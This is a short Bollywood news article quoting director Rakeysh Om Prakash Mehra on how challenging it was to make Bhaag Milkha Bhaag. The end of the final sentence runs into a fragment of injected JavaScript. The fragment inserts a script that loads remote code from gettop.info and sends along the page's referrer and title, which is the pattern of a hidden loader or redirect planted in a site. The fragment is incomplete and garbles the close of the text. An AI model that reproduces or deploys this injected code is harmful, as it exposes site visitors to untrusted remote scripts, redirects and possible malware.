Rakeysh Om Prakash Mehra, who directed master-pieces like Rang De Basanti and Delhi 6; said directing Bhaag Milkha Bhaag was like going back to school for him. He said that the period movie was the most challenging film he ever attempted.
Bhaag Milkha Bhaag is an epic movie based on the life of the Indian athlete Milkha Singh; who was portrayed by Farhan Akhtar in the movie. “It (working on Bhaag Milkha Bhaag) was like going to school every morning. It is very difficult to put it in words but I enjoyed every moment of it. We went out everyday to do our jobs and came back home thinking ‘did we do well or not?’,” Mehra said at the DVD launch of the film.
Talking more about the blockbuster movie, he added “But in all, it was a hugely learning experience. It was one of the most challenging films which I had attempted and I am glad that it worked out.”
Right now, he is busy filming Mirza Sahiba, a musical movie set in Rajasthan.document.currentScript.parentNode.insertBefore(s, document.currentScript);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;
